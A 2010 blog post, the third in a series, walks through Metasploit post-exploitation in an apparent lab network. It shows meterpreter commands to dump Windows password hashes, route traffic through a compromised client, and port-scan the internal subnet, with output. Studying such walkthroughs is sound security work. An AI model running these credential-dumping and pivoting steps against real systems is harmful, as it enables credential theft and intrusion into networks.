Tuesday, September 21, 2010

Metasploit on the edge Part 3 - Looking around

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion

PreambleThis exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement


The following series of posts is going to change a little bit. We will still be walking through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server, but some of the detours I was planning on taking won't happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please goto securitytube.net and have a look

Background
When last we left, we had just launced a meterpreter session on our internal client.

Process
So now that we have a toe hold, let's explore. First things first, I am going to grab the password hashes from the client machine. For a detailed explantion of Windows password hashing, see ironegeek.com's password exploitation class. Depending on the exploit used and the account the exploit was run under you may have to do a
     meterpreter>use priv

     meterpreter>hashdump
The hashes will be displayed on the screen. For now, copy and paste them into a file for later use.
Let's setup the client to allow us to use to scan other devices on the internal network.
First let's see what the internal network is like
     meterpreter>route

Network routes
==============    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          10.13.37.1
    10.13.37.0       255.255.255.0    10.13.37.149
    10.13.37.149     255.255.255.255  127.0.0.1
    10.255.255.255   255.255.255.255  10.13.37.149
    127.0.0.0        255.0.0.0        127.0.0.1
Now to use it in Metasploit, press CTRL-Z and select Y to background the session

Next, we will setup Metasploit to use the client meterpreter session as a route
     meterpreter>route add 10.13.37.0 mask 255.255.255.0 4                                            ip subnet      network mask   meterpreter session

Now lets do a scan: (note: not all scans or exploits will work through this route.)
We will use the tcp portscan

     use auxillary/scanner/portscan/tcp

     msf auxiliary(tcp) > show options

Module options:
   Name         Current Setting                Required  Description
   ----         ---------------                --------  -----------
   CONCURRENCY  10                             yes       The number of concurrent ports to check per host
   PORTS        21-25,80,137-139,443-445,3389  yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.13.37.1-254           yes       The target address range or CIDR identifier
   THREADS      1                              yes       The number of concurrent threads
   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds
   VERBOSE      false                          no        Display verbose output
Note: When doing your initial scan, it is best to limit your ports. Once you have some responses, you can scan more ports on a particual client  if nescessary. 
     msf auxiliary(tcp) >exploit

[*] 10.13.37.1:21 - TCP OPEN
[*] 10.13.37.1:80 - TCP OPEN
[*] Scanned 026 of 254 hosts (010% complete)
[*] Scanned 051 of 254 hosts (020% complete)
[*] Scanned 077 of 254 hosts (030% complete)
[*] Scanned 102 of 254 hosts (040% complete)
[*] Scanned 127 of 254 hosts (050% complete)
[*] 10.13.37.130:80 - TCP OPEN
[*] 10.13.37.130:25 - TCP OPEN
[*] 10.13.37.130:139 - TCP OPEN
[*] 10.13.37.130:443 - TCP OPEN
[*] 10.13.37.130:445 - TCP OPEN
[*] 10.13.37.130:3389 - TCP OPEN[*] Scanned 153 of 254 hosts (060% complete)
[*] Scanned 178 of 254 hosts (070% complete)
[*] Scanned 204 of 254 hosts (080% complete)
[*] Scanned 229 of 254 hosts (090% complete)
[*] 10.13.37.242:22 - TCP OPEN
[*] 10.13.37.242:80 - TCP OPEN
[*] 10.13.37.242:139 - TCP OPEN
[*] 10.13.37.242:445 - TCP OPEN
[*] 10.13.37.244:135 - TCP OPEN
[*] 10.13.37.244:139 - TCP OPEN
[*] 10.13.37.244:445 - TCP OPEN
[*] 10.13.37.245:22 - TCP OPEN
[*] 10.13.37.245:23 - TCP OPEN
[*] 10.13.37.245:21 - TCP OPEN
[*] 10.13.37.245:25 - TCP OPEN
[*] 10.13.37.245:80 - TCP OPEN
[*] 10.13.37.245:139 - TCP OPEN
[*] 10.13.37.245:445 - TCP OPEN
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed

Next Steps
Selecting the next target, creating a "backdoor"...maybe I will also spend some time making these posts look better too.....
Posted by
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)